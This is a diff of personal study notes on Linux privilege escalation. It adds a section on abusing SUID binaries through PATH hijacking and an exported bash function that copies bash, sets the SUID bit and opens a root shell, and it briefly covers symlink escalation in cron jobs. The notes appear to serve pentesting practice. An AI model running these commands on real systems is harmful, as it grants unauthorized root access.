sodium410/privesc/linux.md

 --- just create a file and run executable again – it should catch your file and run it !
 Search for c shell code !!
 Compile it and place it in that directory with that name !!

+#### SUID escalation via Environment variable
+find / -type f -perm -4000 -ls 2>/dev/null
+say custom binary with no gtfo exploit.. no shared injection
+strings /usr/local/bin/suid-env  //try check if its calling something inside,
+so this is running service apache2 start command – no full path for service
+place a malicious service in tmp and add tmp to PATH export PATH=/tmp:$PATH  //running suid exe should now refer malicious service giving elevated bash
+Say, full path is in use /usr/bin/service apache2 start
+//can declare a function of that name /usr/bin/service and add it to env variable which gets run on suid file exe
+function /usr/bin/service() {cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
+export -f /usr/bin/service  //exporting the function as env varia
+//running the suid binary now gives an elevated bash !!
+Question around this -- what's the root cause here ? how define any such calls in suid files ?

 #### Escalation via Binary Symlinks
 one of the tests, cron jobs had a symlink run by root - not vulnerable, as symlink dire was not writable
 vulnerable if can change/update symlinks - need write perms - can maybe make it point to then run bin/bash instead ?